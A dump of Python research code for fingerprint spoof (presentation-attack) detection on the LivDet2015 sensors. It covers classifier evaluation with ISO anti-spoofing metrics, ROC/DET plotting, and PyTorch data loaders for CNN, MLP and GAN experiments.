c, d, e, f = fpad_iso_metrics(y_test, y_pred_nb, probs_nb)\n APCER[1, unseen] = a\n BPCER[1, unseen] = b \n BPCER25[1, unseen] = c \n DETC_nb.append(d) \n EER[1, unseen] = e \n AUROC[1, unseen] = f\n \n # -> KNN ------------------------------------------------------------------\n #print(\"-> KNN learning...\")\n from sklearn.neighbors import KNeighborsClassifier\n weights_list = ['uniform', 'distance']\n k_list = range(1, 10)\n otimization_knn = np.ones((len(k_list), len(weights_list)))\n for _w in list(enumerate(weights_list)):\n for _k in list(enumerate(k_list)):\n knn = KNeighborsClassifier(n_neighbors=_k[1], weights=_w[1])\n scores = cross_val_score(knn, X_train, y_train, cv=5)\n otimization_knn[_k[0], _w[0]] = scores.mean()\n \n #print(\"KNN score = {}\".format(np.amax(otimization_knn)))\n result = np.where(otimization_knn == np.amax(otimization_knn))\n listOfCordinates = list(zip(result[0], result[1]))\n best_k = k_list[listOfCordinates[0][0]]\n best_weight = weights_list[listOfCordinates[0][1]]\n \n #print(\"Otimization result -> k={} and weight={}\".format(best_k, best_weight))\n #print(\"------------------------------\")\n \n knn = KNeighborsClassifier(n_neighbors=best_k, weights=best_weight)\n knn.fit(X_train, y_train)\n y_pred_knn = knn.predict(X_test)\n probs_knn = knn.predict_proba(X_test)\n probs_knn = probs_knn[:, 1] \n \n a, b, c, d, e, f = fpad_iso_metrics(y_test, y_pred_knn, probs_knn)\n APCER[2, unseen] = a\n BPCER[2, unseen] = b\n BPCER25[2, unseen] = c\n DETC_knn.append(d)\n EER[2, unseen] = e\n AUROC[2, unseen] = f\n '''\n\n DETC = []\n DETC.append(DETC_svm)\n DETC.append(DETC_nb)\n DETC.append(DETC_knn) \n \n \n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_APCER_\"+ txt, APCER, fmt=\"%.3f\")\n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_BPCER_\"+ txt, BPCER, fmt=\"%.3f\")\n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_BPCER25_\"+ txt, BPCER25, fmt=\"%.3f\")\n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_AUROC_\"+ txt, AUROC, fmt=\"%.3f\")\n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_EER_\"+ txt, EER, fmt=\"%.3f\")\n \n metrics = [APCER, BPCER, BPCER25, AUROC, EER, DETC]\n \n return metrics\n\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n \ndef getPlots(DETC, num_materials, path):\n\n \n svm = DETC[0]\n nb = DETC[1]\n knn = DETC[2]\n \n from matplotlib import pyplot as plt\n plt.ioff()\n \n fig,ax = plt.subplots(2,num_materials)\n fig.suptitle(\"{}/Int\".format(path))\n \n for i in range(num_materials):\n \n x1 = svm[i][0] #fpr\n y1 = svm[i][1] #fnr\n z1 = svm[i][2] #tpr\n \n x2 = nb[i][0]\n y2 = nb[i][1]\n z2 = nb[i][2] \n \n x3 = knn[i][0]\n y3 = knn[i][1]\n z3 = knn[i][2] \n \n ax[0,i].plot(x1,z1, \"-r\", label=\"SVM\")\n ax[0,i].plot(x2,z2, \"-g\", label=\"NB\")\n ax[0,i].plot(x3,z3, \"-b\", label=\"KNN\")\n ax[0,i].plot([0, 1], [0, 1], color='black', linestyle='--')\n ax[0,i].set_title('ROC - Material {}'.format(i+1))\n ax[0,i].legend(loc=\"lower right\")\n \n ax[1,i].axis_min = min(x1[0],y1[-1])\n ax[1,i].plot(x1,y1, \"-r\", label=\"SVM\")\n ax[1,i].plot(x2,y2, \"-g\", label=\"NB\")\n ax[1,i].plot(x3,y3, \"-b\", label=\"KNN\")\n ax[1,i].set_title('DET - Material {}'.format(i+1))\n ax[1,i].legend(loc=\"upper right\")\n \n \n for a in ax[0,:]:\n a.set(xlabel='', ylabel='True Positive Rate')\n\n \n from matplotlib.ticker import FormatStrFormatter \n ticks_to_use = [0.001,0.002,0.005,0.01,0.02,0.05,0.1,0.2,0.5,1,2] \n for a in ax[1,:]:\n a.set(xlabel='BPCER (False Positive Rate)', ylabel='APCER (False Negative Rate)')\n a.label_outer()\n a.set_yscale('log')\n a.set_xscale('log')\n a.get_xaxis().set_major_formatter(FormatStrFormatter('%.2f'))\n a.get_yaxis().set_major_formatter(FormatStrFormatter('%.2f'))\n a.set_xticks(ticks_to_use)\n a.set_yticks(ticks_to_use)\n a.axis([0.001,2,0.001,2])\n \n\n manager = plt.get_current_fig_manager()\n manager.window.showMaximized()\n plt.show()\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n \nimport datetime\n\n# CrossMatch | Digital_Persona | GreenBit | Hi_Scan | Time_Series\n \n#CrossMatch_metrics = unseenAttack('CrossMatch_TESTS', croped=False)\n#CrossMatch_metrics = unseenAttack('Digital_Persona_TESTS', croped=False)\n\nprint(datetime.datetime.now()) \n\n#CrossMatch_metrics = unseenAttack('CrossMatch', croped=False)\n\nDigital_Persona_metrics = unseenAttack('Digital_Persona', croped=False) \nGreenBit_metrics = unseenAttack('GreenBit', croped=False) \nHi_Scan_metrics = unseenAttack('Hi_Scan', croped=False)\nTime_Series_metrics = unseenAttack('Time_Series', croped=False)\n\nCrossMatch_seg_metrics = unseenAttack('CrossMatch', croped=True) \nHi_Scan_seg_metrics = unseenAttack('Hi_Scan', croped=True)\nTime_Series_seg_metrics = unseenAttack('Time_Series', croped=True)\n\n'''\ngetPlots(CrossMatch_metrics[5], 3, 'CrossMatch/Unseen_attack/Without_segmentation')\ngetPlots(Digital_Persona_metrics[5], 4, 'Digital_Persona/Unseen_attack/Without_segmentation')\ngetPlots(GreenBit_metrics[5], 4, 'GreenBit/Unseen_attack/Without_segmentation')\ngetPlots(Hi_Scan_metrics[5], 4, 'Hi_Scan/Unseen_attack/Without_segmentation')\ngetPlots(Time_Series_metrics[5], 3, 'Time_Series/Unseen_attack/Without_segmentation')\n\ngetPlots(CrossMatch_seg_metrics[5], 3, 'CrossMatch/Unseen_attack/Segmentation')\ngetPlots(Hi_Scan_seg_metrics[5], 4, 'Hi_Scan/Unseen_attack/Segmentation')\ngetPlots(Time_Series_seg_metrics[5], 3, 'Time_Series/Unseen_attack/Segmentation')\n'''\nprint(datetime.datetime.now())" }, { "alpha_fraction": 0.49561619758605957, "alphanum_fraction": 0.5177832841873169, "avg_line_length": 31.071617126464844, "blob_id": "dd39cbc553a6b8101737a80b22522e9a60b693bb", "content_id": "b6308c46ad2ef4135608270ef31a67d93918fbaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12090, "license_type": "no_license", "max_line_length": 151, "num_lines": 377, "path": "/CNNreg/data/data_cnn2.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.utils.data import Dataset\nimport scipy.io as sio\nimport os\nimport numpy as np\nimport copy\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import transforms\nimport sys\nfrom PIL import Image\nfrom PIL import ImageOps\n\nclass numpyToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n return torch.from_numpy(sample).float()\n \n#%% SPECIFICATIONS -------------------------------------------------------------------------------------------------\n\nBATCH_SIZE = 12 \n\n#Image dimensions\nMIN_CROP_WIDTH = -1\nMIN_CROP_HEIGHT = -1\n\n#%% Get Data Loaders -------------------------------------------------------------------------------------------------\n#\n# Input: \n# - [STR] path (of the images)\n# - [STR] dataset (CrossMatch, Digital_Persona, GreenBit, Hi_Scan, Time_Series)\n# - [INT] test_material (material id to use for testing - 0, 1 or 2 for CrossMatch and Time_Series | 0, 1, 2 or 3 for the remaining datasets)\n# - [BOOL] croped (True to use the previously segmented and cropped images)\n# - [BOOL] unseen_attack (True to create a test dataset with an unseen attack using the test material)\n#\n# Output: \n# - train, validation and test data loaders\n\ndef get_data_loaders(path, dataset, test_material, croped=True, unseen_attack=False):\n \n global MIN_CROP_WIDTH \n global MIN_CROP_HEIGHT \n global BATCH_SIZE\n\n sensor = dataset\n \n if unseen_attack==True:\n \n if dataset == \"CrossMatch\":\n\n #attack materials idxs and names\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(1000))\n real_test = np.array(range(1000, 1500))\n\n #dimensions\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 247\n \n elif dataset == \"Digital_Persona\":\n\n #attack materials idxs and names\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n\n #dimensions\n MIN_CROP_WIDTH = 224\n MIN_CROP_HEIGHT = 235\n\n elif dataset == \"GreenBit\":\n\n #attack materials idxs and names\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(750))\n real_test = np.array(range(750, 997))\n\n #dimensions\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 271\n\n elif dataset == \"Hi_Scan\":\n\n BATCH_SIZE = 10 #smaller batch size because of memory issues\n\n #attack materials idxs and names\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n\n #dimensions\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 311\n\n elif dataset == \"Time_Series\":\n\n #attack materials idxs and names\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(2960))\n real_test = np.array(range(2960, 4440))\n\n #dimensions\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 225\n\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n \n train_materials = np.delete(materials_list, test_material) #train_materials = materials - test_material (unseen-attack)\n \n data = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n data_test = FPAD(path, dataset, material_idx=[test_material], real_idx=real_test, croped=croped)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n else:\n \n if dataset == \"CrossMatch\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.random.randint(low=0, high=1500, size=500)\n\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 247\n\n elif dataset == \"Digital_Persona\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=1000, size=250)\n\n MIN_CROP_WIDTH = 224\n MIN_CROP_HEIGHT = 235\n\n elif dataset == \"GreenBit\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=997, size=250)\n \n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 271\n\n elif dataset == \"Hi_Scan\":\n\n BATCH_SIZE = 10\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=1000, size=250)\n\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 311\n\n elif dataset == \"Time_Series\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.random.randint(low=0, high=4440, size=1480)\n\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 225\n\n else:\n sys.exit(\"Error: incorrect dataset!\") \n \n \n train_materials = [test_material] #one-attack = just one material to train and to test\n \n dataset = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n \n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n _dataset, data_test = torch.utils.data.random_split(dataset, [train_size, test_size])\n \n train_size = int(0.8 * len(_dataset))\n val_size = len(_dataset) - train_size\n data_train, data_val = torch.utils.data.random_split(_dataset, [train_size, val_size])\n \n #Print info about datasets\n print('\\n--------------------------------------')\n print('Dataset: ' + sensor)\n print('Train materials: ', end=\"\")\n for material in train_materials:\n print(materials_name[material], end=\" \")\n print('\\nTest material: {}'.format(materials_name[test_material]))\n \n #Params of the data loaders\n params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0} \n \n #Data loaders\n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n #Print info about data loaders\n print('\\nDatasets size: Train {}, Val {}, Test {}'.format(len(data_train),\n len(data_val),\n len(data_test)))\n \n return train_loader, valid_loader, test_loader\n\n#%% DATASET -------------------------------------------------------------------------------------------------------\n\nIMG_HEIGHT = -1 \nIMG_WIDTH = -1 \n\nclass FPAD(Dataset):\n def __init__(self,\n PATH,\n dataset,\n material_idx,\n real_idx,\n croped = True):\n\n self.material_idx = material_idx\n self.real_idx = real_idx\n self.dataset = dataset\n self.croped = croped\n \n if dataset == \"CrossMatch\" or dataset==\"Time_Series\":\n self.materials = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n else:\n self.materials = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n # Initialize X (data), y (real=1, fake=0), and f (fake material id) arrays\n X = []\n y = []\n f = []\n f_norm = []\n \n #PRESENTATION ATTACK SAMPLES\n \n count = 0\n \n index_norm = 0\n \n for index in self.material_idx: \n \n if croped == False:\n self.fake_dir = PATH + dataset + \"/Fake/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path = PATH + dataset + \"/\" + self.materials[index] + \".txt\"\n else:\n self.fake_dir = PATH + dataset + \"/Fake_c/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path= PATH + dataset + \"/\" + self.materials[index] + \"_c.txt\"\n \n with open(txt_path, 'r') as file:\n fake_names = file.readlines()\n \n count = count + len(fake_names)\n \n X.extend(fake_names)\n y.extend([1]*len(fake_names))\n \n f.extend([index]*len(fake_names))\n f_norm.extend([index_norm]*len(fake_names))\n \n index_norm = index_norm + 1\n \n self.n_presentation_attack_samples = count\n\n #BONAFIDE SAMPLES\n \n if croped == False:\n path = PATH + dataset + \"/real.txt\"\n else:\n path = PATH + dataset + \"/real_c.txt\"\n \n # read real names\n with open(path, 'r') as file:\n real_names = file.readlines()\n \n real_names = np.array(real_names)\n \n self.n_bonafide_samples = self.real_idx.shape[0]\n \n real_names = real_names[self.real_idx] \n\n # append real_data to X, y, and f arrays\n X.extend(real_names)\n y.extend([0]*self.n_bonafide_samples)\n f.extend([-1]*self.n_bonafide_samples)\n f_norm.extend([-1]*self.n_bonafide_samples)\n\n self.X = np.array(X)\n self.y = np.array(y)\n self.f = np.array(f)\n self.f_norm = np.array(f_norm)\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self, idx):\n \n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n img_name = self.X[idx]\n\n \n sample = Image.open(img_name.rstrip())\n width, height = sample.size\n \n \n if self.croped == True: \n \n \n sample = Image.fromarray(np.uint8(sample))\n width, height = sample.size\n \n \n left = int((width-MIN_CROP_WIDTH)/2)\n right = width - MIN_CROP_WIDTH - left\n top = int((height-MIN_CROP_HEIGHT)/2)\n bottom = height - MIN_CROP_HEIGHT - top\n \n sample = ImageOps.crop(sample, (left, top, right, bottom)) \n \n transformation = self.transformations()\n \n sample = np.array(sample)\n \n \n \n if self.dataset == \"Digital_Persona\":\n \n sample = sample[:,:,0]\n sample = np.transpose(sample)\n \n \n sample.reshape((1, sample.shape[0], sample.shape[1]))\n \n return transformation(sample).view((1, sample.shape[0], sample.shape[1])), self.y[idx], self.f[idx], self.f_norm[idx]\n \n def transformations(self):\n data_transform = transforms.Compose([transforms.ToTensor()])\n return data_transform\n \n#%% MAIN\n \nif __name__ == '__main__':\n \n train, val, test = get_data_loaders(\"/ctm-hdd-pool01/DB/LivDet2015/train/\", \"Digital_Persona\", 0, croped=True, unseen_attack=True)\n\n for i, (x, y, f, _) in enumerate(train):\n print(x.shape)\n print(y.shape)\n print(f.shape)\n break" }, { "alpha_fraction": 0.5205720067024231, "alphanum_fraction": 0.544133186340332, "avg_line_length": 35.4529914855957, "blob_id": "f3ac6fedb93cefd13fbea3d92671a23856dada06", "content_id": "6f5fbd91d80195d275292ae4aa5adc4263daa4b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8531, "license_type": "no_license", "max_line_length": 104, "num_lines": 234, "path": "/MLP/data/data_mlp.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.utils.data import Dataset\nimport scipy.io as sio\nimport os\nimport numpy as np\nimport copy\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import transforms\nimport pandas as pd\nimport sys\n\nclass numpyToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n return torch.from_numpy(sample).float()\n \n#PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n#DATASET=\"CrossMatch\"\nBATCH_SIZE = 64\n\ndef get_data_loaders(path, dataset, test_material, croped=False, unseen_attack=False):\n \n if unseen_attack==True:\n \n if dataset == \"CrossMatch\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.array(range(1000))\n real_test = np.array(range(1000, 1500))\n elif dataset == \"Digital_Persona\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n elif dataset == \"GreenBit\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 997))\n elif dataset == \"Hi_Scan\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n elif dataset == \"Time_Series\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.array(range(2960))\n real_test = np.array(range(2960, 4440))\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n \n train_materials = np.delete(materials_list, test_material)\n \n data = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n data_test = FPAD(path, dataset, material_idx=[test_material], real_idx=real_test, croped=croped)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n else:\n \n if dataset == \"CrossMatch\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.random.randint(low=0, high=1500, size=500)\n elif dataset == \"Digital_Persona\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=1000, size=250)\n elif dataset == \"GreenBit\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=997, size=250)\n elif dataset == \"Hi_Scan\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=1000, size=250)\n elif dataset == \"Time_Series\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.random.randint(low=0, high=4440, size=1480)\n else:\n sys.exit(\"Error: incorrect dataset!\") \n \n \n train_materials = [test_material]\n \n dataset = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n \n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n _dataset, data_test = torch.utils.data.random_split(dataset, [train_size, test_size])\n \n train_size = int(0.8 * len(_dataset))\n val_size = len(_dataset) - train_size\n data_train, data_val = torch.utils.data.random_split(_dataset, [train_size, val_size])\n \n \n print('\\n--------------------------------------')\n print('Train materials: ', end=\"\")\n for material in train_materials:\n print(materials_name[material], end=\" \")\n print('\\nTest material: {}'.format(materials_name[test_material]))\n \n #Data loaders\n \n params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0} \n \n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n print('\\nDatasets size: Train {}, Val {}, Test {}'.format(len(data_train),\n len(data_val),\n len(data_test)))\n \n return train_loader, valid_loader, test_loader\n\nclass FPAD(Dataset):\n def __init__(self,\n path,\n dataset,\n material_idx,\n real_idx,\n croped = False):\n\n self.material_idx = material_idx\n self.real_idx = real_idx\n self.dataset = dataset\n \n if dataset == \"CrossMatch\" or dataset==\"Time_Series\":\n self.materials = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n else:\n self.materials = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n # Initialize X (data), y (real=1, fake=0), and f (fake material id) arrays\n X = []\n y = []\n f = []\n f_norm = []\n \n #PRESENTATION ATTACK SAMPLES\n \n count = 0\n \n for index in self.material_idx: \n \n if croped == False:\n self.fake_dir = path + self.dataset + \"_\" + self.materials[index] + \".csv\"\n if croped == True:\n self.fake_dir = path + self.dataset + \"_\" + self.materials[index] + \"_c.csv\"\n \n df = pd.read_csv(self.fake_dir)\n \n features_pa = df.to_numpy(copy=True)\n features_pa = features_pa[:, 1:]\n \n n_pa = features_pa.shape[0]\n \n count = count + n_pa\n \n X.extend(features_pa)\n y.extend([1]*n_pa)\n f.extend([index]*n_pa)\n f_norm.extend([index]*n_pa)\n \n self.n_presentation_attack_samples = count\n\n #BONAFIDE SAMPLES\n \n if croped == False:\n self.real_dir = path + self.dataset + \"_real.csv\"\n else:\n self.real_dir = path + self.dataset + \"_real_c.csv\"\n \n df = pd.read_csv(self.real_dir)\n \n features_bf = df.to_numpy(copy=True)\n features_bf = features_bf[:, 1:]\n \n self.n_bonafide_samples = self.real_idx.shape[0]\n \n features_bf = features_bf[self.real_idx] \n\n # append real_data to X, y, and f arrays\n X.extend(features_bf)\n y.extend([0]*self.n_bonafide_samples)\n f.extend([-1]*self.n_bonafide_samples)\n f_norm.extend([-1]*self.n_bonafide_samples)\n\n self.X = np.array(X)\n self.y = np.array(y)\n self.f = np.array(f)\n self.f_norm = np.array(f_norm)\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self, index):\n tranformation = self.tranformations()\n return tranformation(self.X[index]), self.y[index], self.f[index], self.f_norm[index]\n \n def tranformations(self):\n data_transform = transforms.Compose([numpyToTensor()])\n return data_transform\n \n#%%\n \nif __name__ == '__main__':\n \n BATCH_SIZE = 32\n DATASET = \"CrossMatch\"\n\n data = FPAD(DATASET, material_idx=[1, 2], real_idx=np.array(range(1000)), croped=False)\n data_test = FPAD(DATASET, material_idx=[0], real_idx=np.array(range(1000, 1500)), croped=False)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0}\n \n \n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n" }, { "alpha_fraction": 0.5058882236480713, "alphanum_fraction": 0.5266467332839966, "avg_line_length": 31.430419921875, "blob_id": "b010cbc9d6d405f823fc41331147d1d74d0ee157", "content_id": "5362c39b3454666bc1562242683379380fe540cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10020, "license_type": "no_license", "max_line_length": 151, "num_lines": 309, "path": "/CNNreg+II-GAN/data/data_gen.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.utils.data import Dataset\nimport scipy.io as sio\nimport os\nimport numpy as np\nimport copy\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import transforms\nimport sys\nfrom PIL import Image\nfrom PIL import ImageOps\n\n\nclass numpyToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n return torch.from_numpy(sample).float() \n\n#%% Get Data Loaders -------------------------------------------------------------------------------------------------\n#\n# Input: \n# - [STR] path (of the images)\n# - [STR] dataset (CrossMatch, Digital_Persona, GreenBit, Hi_Scan, Time_Series)\n# - [INT] test_material (material id to use for testing - 0, 1 or 2 for CrossMatch and Time_Series | 0, 1, 2 or 3 for the remaining datasets)\n# - [INT] img_size (square img)\n# - [INT] batch_size\n# - [BOOL] croped (True to use the previously segmented and cropped images)\n# - [BOOL] unseen_attack (True to create a test dataset with an unseen attack using the test material)\n#\n# Output: \n# - train, validation and test data loaders\n\ndef get_data_loaders(path, dataset, test_material, img_size, batch_size, croped=True, unseen_attack=False):\n \n global BATCH_SIZE\n \n if unseen_attack==True:\n \n if dataset == \"CrossMatch\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.array(range(1000))\n real_test = np.array(range(1000, 1500))\n\n elif dataset == \"Digital_Persona\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n\n elif dataset == \"GreenBit\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.array(range(750))\n real_test = np.array(range(750, 997))\n \n elif dataset == \"Hi_Scan\":\n\n BATCH_SIZE = 16\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n\n elif dataset == \"Time_Series\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.array(range(2960))\n real_test = np.array(range(2960, 4440))\n\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n \n train_materials = np.delete(materials_list, test_material)\n \n data = FPAD(path, dataset, img_size, material_idx=train_materials, real_idx=real_train)\n data_test = FPAD(path, dataset, img_size, material_idx=[test_material], real_idx=real_test)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n else:\n \n if dataset == \"CrossMatch\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.random.randint(low=0, high=1500, size=500)\n \n elif dataset == \"Digital_Persona\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=1000, size=250)\n \n elif dataset == \"GreenBit\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=997, size=250)\n \n elif dataset == \"Hi_Scan\":\n\n BATCH_SIZE = 16\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=1000, size=250)\n\n elif dataset == \"Time_Series\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.random.randint(low=0, high=4440, size=1480)\n\n else:\n sys.exit(\"Error: incorrect dataset!\") \n \n \n train_materials = [test_material]\n \n dataset = FPAD(path, dataset, img_size, material_idx=train_materials, real_idx=real_train)\n \n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n _dataset, data_test = torch.utils.data.random_split(dataset, [train_size, test_size])\n \n train_size = int(0.8 * len(_dataset))\n val_size = len(_dataset) - train_size\n data_train, data_val = torch.utils.data.random_split(_dataset, [train_size, val_size])\n \n \n print('\\n--------------------------------------')\n print('Dataset: ' + dataset)\n print('Train materials: ', end=\"\")\n for material in train_materials:\n print(materials_name[material], end=\" \")\n 